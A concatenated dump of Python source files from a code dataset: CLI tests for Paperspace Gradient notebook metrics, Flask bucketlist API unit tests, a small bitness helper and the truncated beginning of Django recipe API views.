def test_should_read_metrics_when_metrics_get_command_was_used_with_all_options(self, get_patched):
get_patched.side_effect = [
MockResponse(self.GET_NOTEBOOK_RESPONSE_JSON),
MockResponse(self.GET_METRICS_RESPONSE_JSON),
]
runner = CliRunner()
result = runner.invoke(cli.cli, self.ALL_OPTIONS_COMMAND)
# comparing objects instead of strings because Py2 and Py3 produce slightly different outputs
assert json.loads(result.output.strip()) == json.loads(self.EXPECTED_STDOUT.strip()), result.exc_info
get_patched.assert_has_calls(
[
mock.call(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
),
mock.call(
self.GET_METRICS_URL,
json=None,
params=self.ALL_COMMANDS_GET_METRICS_REQUEST_PARAMS,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
),
]
)
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_read_metrics_when_metrics_get_was_executed_and_options_file_was_used(
self, get_patched, notebooks_metrics_get_config_path):
get_patched.side_effect = [
MockResponse(self.GET_NOTEBOOK_RESPONSE_JSON),
MockResponse(self.GET_METRICS_RESPONSE_JSON),
]
command = self.FULL_OPTIONS_COMMAND_WITH_OPTIONS_FILE[:] + [notebooks_metrics_get_config_path]
runner = CliRunner()
result = runner.invoke(cli.cli, command)
# comparing objects instead of strings because Py2 and Py3 produce slightly different outputs
assert json.loads(result.output.strip()) == json.loads(self.EXPECTED_STDOUT.strip()), result.exc_info
get_patched.assert_has_calls(
[
mock.call(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
),
mock.call(
self.GET_METRICS_URL,
json=None,
params=self.ALL_COMMANDS_GET_METRICS_REQUEST_PARAMS,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
),
]
)
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_print_valid_error_message_when_invalid_api_key_was_used(self, get_patched):
get_patched.return_value = MockResponse({"status": 400, "message": "Invalid API token"},
status_code=403)
runner = CliRunner()
result = runner.invoke(cli.cli, self.ALL_OPTIONS_COMMAND)
assert result.output == self.EXPECTED_STDOUT_WHEN_INVALID_API_KEY_WAS_USED, result.exc_info
get_patched.assert_called_once_with(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
)
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
    def test_should_print_valid_error_message_when_notebook_was_not_found(self, get_patched):
        get_patched.side_effect = [
            MockResponse({"error": {"name": "ApplicationError", "status": 404,
                                    "message": "Not found. Please contact support@paperspace.com for help."}},
                         status_code=404),
        ]
        runner = CliRunner()
        result = runner.invoke(cli.cli, self.ALL_OPTIONS_COMMAND)
        assert result.output == self.EXPECTED_STDOUT_WHEN_NOTEBOOK_WAS_NOT_FOUND, result.exc_info
get_patched.assert_has_calls(
[
mock.call(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
),
]
)
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
    def test_should_print_valid_message_when_no_metrics_were_returned(self, get_patched):
get_patched.side_effect = [
MockResponse(self.GET_NOTEBOOK_RESPONSE_JSON),
MockResponse(example_responses.NOTEBOOKS_METRICS_GET_RESPONSE_WHEN_NO_METRICS_WERE_FOUND),
]
runner = CliRunner()
result = runner.invoke(cli.cli, self.ALL_OPTIONS_COMMAND)
        assert json.loads(result.output.strip()) == json.loads(self.EXPECTED_STDOUT_WHEN_NO_METRICS_WERE_FOUND.strip()), \
            str(result.output) + str(result.exc_info)
get_patched.assert_has_calls(
[
mock.call(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
),
mock.call(
self.GET_METRICS_URL,
json=None,
params=self.ALL_COMMANDS_GET_METRICS_REQUEST_PARAMS,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
),
]
)
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_print_valid_error_message_when_error_code_was_returned_without_error_message(self, get_patched):
get_patched.side_effect = [
MockResponse(self.GET_NOTEBOOK_RESPONSE_JSON),
MockResponse(status_code=500),
]
runner = CliRunner()
result = runner.invoke(cli.cli, self.ALL_OPTIONS_COMMAND)
assert result.output == self.EXPECTED_STDOUT_WHEN_ERROR_CODE_WAS_RETURNED_WITHOUT_ERROR_MESSAGE, result.exc_info
get_patched.assert_has_calls(
[
mock.call(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
),
mock.call(
self.GET_METRICS_URL,
json=None,
params=self.ALL_COMMANDS_GET_METRICS_REQUEST_PARAMS,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
),
]
)
assert result.exit_code == 0, result.exc_info
class TestNotebooksMetricsStreamCommand(object):
GET_NOTEBOOK_URL = "https://api.paperspace.io/notebooks/getNotebook"
GET_METRICS_URL = "https://aws-testing.paperspace.io/metrics/api/v1/stream"
BASIC_OPTIONS_COMMAND = [
"notebooks", "metrics", "stream",
"--id", "ngw7piq9",
]
ALL_OPTIONS_COMMAND = [
"notebooks", "metrics", "stream",
"--id", "ngw7piq9",
"--metric", "gpuMemoryFree",
"--metric", "gpuMemoryUsed",
"--interval", "20s",
"--apiKey", "some_key",
]
ALL_OPTIONS_COMMAND_WITH_OPTIONS_FILE = [
"notebooks", "metrics", "stream",
"--optionsFile", # path added in test,
]
GET_NOTEBOOK_REQUEST_JSON = {"notebookId": "ngw7piq9"}
BASIC_COMMAND_CHART_DESCRIPTOR = '{"chart_names": ["cpuPercentage", "memoryUsage"], "handles": ["ngw7piq9"' \
'], "object_type": "notebook", "poll_interval": "30s"}'
ALL_COMMANDS_CHART_DESCRIPTOR = '{"chart_names": ["gpuMemoryFree", "gpuMemoryUsed"], "handles": ["ngw7piq9' \
'"], "object_type": "notebook", "poll_interval": "20s"}'
GET_NOTEBOOK_RESPONSE_JSON = example_responses.NOTEBOOK_GET_RESPONSE
GET_NOTEBOOK_RESPONSE_JSON_WHEN_NOTEBOOK_NOT_FOUND = {
"error": {
"name": "ApplicationError",
"status": 404,
"message": "Not found. Please contact support@paperspace.com for help.",
},
}
EXPECTED_TABLE_1 = """+----------+---------------+-------------+
| Pod | cpuPercentage | memoryUsage |
+----------+---------------+-------------+
| nrwed38p | | 54013952 |
+----------+---------------+-------------+
"""
EXPECTED_TABLE_2 = """+----------+----------------------+-------------+
| Pod | cpuPercentage | memoryUsage |
+----------+----------------------+-------------+
| nrwed38p | 0.006907773333334353 | 54013952 |
+----------+----------------------+-------------+
"""
EXPECTED_TABLE_3 = """+----------+----------------------+-------------+
| Pod | cpuPercentage | memoryUsage |
+----------+----------------------+-------------+
| nrwed38p | 0.006907773333334353 | 12345667 |
+----------+----------------------+-------------+
"""
ALL_OPTIONS_EXPECTED_TABLE_1 = """+----------+---------------+---------------+
| Pod | gpuMemoryFree | gpuMemoryUsed |
+----------+---------------+---------------+
| nrwed38p | 1234 | |
+----------+---------------+---------------+
"""
ALL_OPTIONS_EXPECTED_TABLE_2 = """+----------+---------------+---------------+
| Pod | gpuMemoryFree | gpuMemoryUsed |
+----------+---------------+---------------+
| nrwed38p | 1234 | |
+----------+---------------+---------------+
"""
ALL_OPTIONS_EXPECTED_TABLE_3 = """+----------+---------------+---------------+
| Pod | gpuMemoryFree | gpuMemoryUsed |
+----------+---------------+---------------+
| nrwed38p | 2345 | 32 |
+----------+---------------+---------------+
"""
EXPECTED_STDOUT_WHEN_INVALID_API_KEY_WAS_USED = "Failed to fetch data: Incorrect API Key provided\nForbidden\n"
    EXPECTED_STDOUT_WHEN_NOTEBOOK_WAS_NOT_FOUND = "Failed to fetch data: Not found. Please contact " \
                                                  "support@paperspace.com for help.\n"
@mock.patch("gradient.api_sdk.repositories.common.websocket.create_connection")
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
    def test_should_read_all_available_metrics_when_metrics_stream_command_was_used_with_basic_options(
self, get_patched, create_ws_connection_patched,
basic_options_metrics_stream_websocket_connection_iterator):
get_patched.return_value = MockResponse(self.GET_NOTEBOOK_RESPONSE_JSON)
ws_connection_instance_mock = mock.MagicMock()
ws_connection_instance_mock.__iter__ = basic_options_metrics_stream_websocket_connection_iterator
create_ws_connection_patched.return_value = ws_connection_instance_mock
runner = CliRunner()
result = runner.invoke(cli.cli, self.BASIC_OPTIONS_COMMAND)
assert self.EXPECTED_TABLE_1 in result.output, result.exc_info
assert self.EXPECTED_TABLE_2 in result.output, result.exc_info
assert self.EXPECTED_TABLE_3 in result.output, result.exc_info
get_patched.assert_called_once_with(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS,
)
ws_connection_instance_mock.send.assert_called_once_with(self.BASIC_COMMAND_CHART_DESCRIPTOR)
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.repositories.common.websocket.create_connection")
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
    def test_should_read_metrics_when_metrics_stream_command_was_used_with_all_options(
self, get_patched, create_ws_connection_patched,
all_options_metrics_stream_websocket_connection_iterator):
get_patched.return_value = MockResponse(self.GET_NOTEBOOK_RESPONSE_JSON)
ws_connection_instance_mock = mock.MagicMock()
ws_connection_instance_mock.__iter__ = all_options_metrics_stream_websocket_connection_iterator
create_ws_connection_patched.return_value = ws_connection_instance_mock
runner = CliRunner()
result = runner.invoke(cli.cli, self.ALL_OPTIONS_COMMAND)
assert self.ALL_OPTIONS_EXPECTED_TABLE_1 in result.output, result.exc_info
assert self.ALL_OPTIONS_EXPECTED_TABLE_2 in result.output, result.exc_info
assert self.ALL_OPTIONS_EXPECTED_TABLE_3 in result.output, result.exc_info
get_patched.assert_called_once_with(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
)
ws_connection_instance_mock.send.assert_called_once_with(self.ALL_COMMANDS_CHART_DESCRIPTOR)
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.repositories.common.websocket.create_connection")
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
    def test_should_read_metrics_when_metrics_stream_was_executed_and_options_file_was_used(
self, get_patched, create_ws_connection_patched,
all_options_metrics_stream_websocket_connection_iterator,
notebooks_metrics_stream_config_path):
get_patched.return_value = MockResponse(self.GET_NOTEBOOK_RESPONSE_JSON)
ws_connection_instance_mock = mock.MagicMock()
ws_connection_instance_mock.__iter__ = all_options_metrics_stream_websocket_connection_iterator
create_ws_connection_patched.return_value = ws_connection_instance_mock
command = self.ALL_OPTIONS_COMMAND_WITH_OPTIONS_FILE[:] + [notebooks_metrics_stream_config_path]
runner = CliRunner()
result = runner.invoke(cli.cli, command)
assert self.ALL_OPTIONS_EXPECTED_TABLE_1 in result.output, result.exc_info
assert self.ALL_OPTIONS_EXPECTED_TABLE_2 in result.output, result.exc_info
assert self.ALL_OPTIONS_EXPECTED_TABLE_3 in result.output, result.exc_info
get_patched.assert_called_once_with(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
)
ws_connection_instance_mock.send.assert_called_once_with(self.ALL_COMMANDS_CHART_DESCRIPTOR)
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.repositories.common.websocket.create_connection")
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_print_valid_error_message_when_invalid_api_key_was_used(
self, get_patched, create_ws_connection_patched):
get_patched.return_value = MockResponse({"status": 400, "message": "Invalid API token"}, 400)
runner = CliRunner()
result = runner.invoke(cli.cli, self.ALL_OPTIONS_COMMAND)
assert "Failed to fetch data: Invalid API token\n" == result.output, result.exc_info
get_patched.assert_called_once_with(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
)
create_ws_connection_patched.assert_not_called()
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.repositories.common.websocket.create_connection")
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
    def test_should_print_valid_error_message_when_notebook_was_not_found(
            self, get_patched, create_ws_connection_patched):
        get_patched.return_value = MockResponse(self.GET_NOTEBOOK_RESPONSE_JSON_WHEN_NOTEBOOK_NOT_FOUND, 404)
        runner = CliRunner()
        result = runner.invoke(cli.cli, self.ALL_OPTIONS_COMMAND)
        assert result.output == self.EXPECTED_STDOUT_WHEN_NOTEBOOK_WAS_NOT_FOUND, result.exc_info
get_patched.assert_called_once_with(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
)
create_ws_connection_patched.assert_not_called()
assert result.exit_code == 0, result.exc_info
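# The MockResponse double used by the tests above is defined earlier in the
# suite. A minimal sketch of the interface those tests rely on, under a
# distinct name so it does not shadow the real helper (constructor signature
# inferred from the call sites; attribute names are assumptions):
class _MockResponseSketch(object):
    def __init__(self, json_data=None, status_code=200):
        self.json_data = json_data        # payload returned by .json()
        self.status_code = status_code    # status checked by the HTTP client
        self.ok = status_code < 400       # requests-style success flag

    def json(self):
        if self.json_data is None:
            raise ValueError("No JSON content in mocked response")
        return self.json_data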
[dataset columns omitted: per-file line-length statistics and quality signals for the file above]
[next dataset row: tests/test_bucketlist.py · faithngetich/Buckectlist (head f7503d2de93d733a8ef44a8c36d9410d40fea4e3) · MIT · 22,877 bytes · Python · blob 364c028538c1c44b737307d6bc409ccae5818a66 · 1 star (2017-05-27 to 2017-05-29)]
import json
import unittest

from app import create_app
from app.models import db
TEST_DB = 'test.db'
class TestBucketlistAPI(unittest.TestCase):
def setUp(self):
self.app = create_app('test')
self.app_context = self.app.app_context()
self.app_context.push()
db.create_all()
self.client = self.app.test_client()
    def tearDown(self):
        """Tear down all test db data and reset the db to an empty state."""
        db.session.remove()
        db.drop_all()
        self.app_context.pop()
    def test_add_bucketlist(self):
# binds the app with the current context
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "Bucketlist successfully created!")
self.assertEqual(response.status_code, 201)
def test_cannot_access_resource_if_not_authenticated(self):
response = self.client.post('/api/v1/bucketlists',
content_type="application/json",)
self.assertEqual(response.status_code, 401)
def test_create_bucketlist_without_name(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "You did not include a bucketlist name.")
self.assertEqual(response.status_code, 400)
    def test_duplicate_bucketlist(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "Bucketlist successfully created!")
self.assertEqual(response.status_code, 201)
            # create the same bucketlist again
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "Bucketlist already exists")
self.assertEqual(response.status_code, 400)
def test_add_item(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
# create item
response = self.client.post(
'/api/v1/bucketlists/1/items',
data=json.dumps(dict(
item_name='Trav to ernder'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "Item successfully created!")
self.assertEqual(response.status_code, 201)
def test_create_item_without_name(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
            # create item
response = self.client.post(
'/api/v1/bucketlists/1/items',
data=json.dumps(dict(
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "You did not include an Item name.")
self.assertEqual(response.status_code, 400)
def test_create_bucketlist_with_empty_name_string(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name=""
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "The bucketlist name is too short.")
self.assertEqual(response.status_code, 400)
def test_create_item_with_empty_name_string(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name=""
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
# create item
response = self.client.post(
'/api/v1/bucketlists/1/items',
data=json.dumps(dict(
item_name=""
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "The item name is too short.")
self.assertEqual(response.status_code, 400)
def test_lists_bucketlists(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "Bucketlist successfully created!")
self.assertEqual(response.status_code, 201)
# request for bucketlists
response = self.client.get('/api/v1/bucketlists',
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
self.assertEqual(response.status_code, 200)
def test_list_single_bucketlist(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "Bucketlist successfully created!")
self.assertEqual(response.status_code, 201)
# request for bucketlists
response = self.client.get('/api/v1/bucketlists/1',
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
self.assertEqual(response.status_code, 200)
def test_updates_bucketlist(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
# update bucket
response = self.client.put(
'/api/v1/bucketlists/1',
data=json.dumps(dict(
name='Travel to wendani'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 200)
def test_updates_items(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
            data = json.loads(response.data.decode())
            # create item
            response = self.client.post(
                '/api/v1/bucketlists/1/items',
                data=json.dumps(dict(
                    item_name='Travel to wendani'
                )),
                headers={"Authorization": "JWT {}".format(token)},
                content_type='application/json'
            )
            # update the item (assumes the API supports PUT on the item route,
            # mirroring the delete route used in test_deletes_item below)
            response = self.client.put(
                '/api/v1/bucketlists/1/items/1',
                data=json.dumps(dict(
                    item_name='Travel to mombasa'
                )),
                headers={"Authorization": "JWT {}".format(token)},
                content_type='application/json'
            )
            data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 200)
    def test_deletes_item(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
# create item
response = self.client.post(
'/api/v1/bucketlists/1/items',
data=json.dumps(dict(
item_name="Read the whole bible"
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
# delete item
response = self.client.delete(
'/api/v1/bucketlists/1/items/1',
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 200)
def test_deletes_invalid_bucketlist(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
            # delete a bucketlist that does not exist
response = self.client.delete(
'/api/v1/bucketlists/26',
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 404)
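    # The register/login boilerplate above repeats in every test. A minimal
    # helper sketch that the tests could call instead (assumes the same
    # /api/v1/auth/register and /api/login endpoints used above):
    def _register_and_login(self, username='jom', password='123456'):
        """Register a user, log in, and return the JWT access token."""
        credentials = json.dumps(dict(username=username, password=password))
        self.client.post(
            '/api/v1/auth/register',
            data=credentials,
            content_type='application/json'
        )
        response = self.client.post(
            '/api/login',
            data=credentials,
            content_type='application/json'
        )
        return json.loads(response.data.decode())['access_token']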
if __name__ == "__main__":
unittest.main()
[dataset columns omitted: per-file line-length statistics and quality signals for the file above]
[next dataset row: src/aestheta/environment.py · NSCC-COGS/Aestheta (head 527517c64b03cf4206a177b3bd0fe223c8ef386a) · MIT · 175 bytes · Python · blob 3668328057acf9fd96d68e25d328c08fdf7035c8 · 8 stars, 62 issues, 3 forks]
import struct
#import toml
def bitness():
    # struct.calcsize("P") is the size of a C pointer in bytes;
    # multiplying by 8 gives the interpreter's bitness (32 or 64).
    return struct.calcsize("P") * 8
#def load_config():
# with open('Config/config.toml') as f:
# return toml.load(f)
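# Example usage of bitness(); the commented-out load_config above would work
# as written once the `toml` package is installed (the config path there is
# carried over from the original comment, not verified here):
if __name__ == "__main__":
    print("Interpreter bitness:", bitness())  # prints 64 on a 64-bit build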
[dataset columns omitted: per-file line-length statistics and quality signals for the file above]
[next dataset row: recipes/views.py · kayoslab/CookbookAPI (head 4a80c486bdcdf238514bd2035b371d640f6ab2ed) · MIT · 14,042 bytes · Python · blob 36f7be87d19e7754de6a2a7667c21f3c10cf9935]
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from django.db.models import QuerySet
from rest_framework.renderers import JSONRenderer
from rest_framework.parsers import JSONParser
from rest_framework import status
from recipes.models import Recipe
from recipes.serializers import RecipeSerializer
from drf_yasg.utils import swagger_auto_schema
from drf_yasg import openapi
from rest_framework.views import APIView
class JSONResponse(HttpResponse):
def __init__(self, data, **kwargs):
content = JSONRenderer().render(data)
kwargs['content_type'] = 'application/json'
super(JSONResponse, self).__init__(content, **kwargs)
class RecipeListView(APIView):
@csrf_exempt
@swagger_auto_schema(
operation_description="Gets a list of Recipe objects.",
responses={
200: RecipeSerializer(many=True)
},
tags=['Recipe'],
)
def get(self, request, *args, **kwargs):
objects: QuerySet[Recipe] = Recipe.objects.all()
serializer = RecipeSerializer(objects, many=True)
return JSONResponse(serializer.data)
@csrf_exempt
@swagger_auto_schema(
operation_description="Creates a new Recipe entry.",
request_body=openapi.Schema(
type=openapi.TYPE_OBJECT,
required=['name'],
properties={
'name': openapi.Schema(
                description="The recipe's unique name.",
type=openapi.TYPE_STRING
),
'url': openapi.Schema(
description="""
The URL from which the recipe comes originally.
This URL will be used to download a pdf export of the recipe
to allow traceability and long term storage.
""",
type=openapi.TYPE_STRING
),
'note': openapi.Schema(
description="""
                    A descriptive text which might be helpful for finding the
                    recipe again when using the search functionality. You might
                    want to note what was good and bad; additional information
                    and significant facts are also useful for indexing.
""",
type=openapi.TYPE_STRING
),
'cuisine_ids': openapi.Schema(
description="""
                    A list of cuisines' unique ids in order to link an existing
cuisine to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
'diet_ids': openapi.Schema(
description="""
                    A list of diets' unique ids in order to link an existing
diet to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
'ingredient_ids': openapi.Schema(
description="""
                    A list of ingredients' unique ids in order to link an existing
ingredient to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
'occasion_ids': openapi.Schema(
description="""
                    A list of occasions' unique ids in order to link an existing
occasion to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
},
),
responses={
200: RecipeSerializer(many=False),
400: """
The required request parameters are not met or an expected
object could not be retrieved from the data store.
""",
},
tags=['Recipe'],
)
def post(self, request):
data = JSONParser().parse(request)
serializer = RecipeSerializer(data=data)
if serializer.is_valid():
serializer.save()
return JSONResponse(
serializer.data,
status=status.HTTP_201_CREATED
)
return JSONResponse(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
class RecipeDetailView(APIView):
@csrf_exempt
@swagger_auto_schema(
operation_description="Gets a Recipe object for a given id.",
responses={
200: RecipeSerializer(many=False),
404: """
The object could not be retrieved, since it doesn't exist.
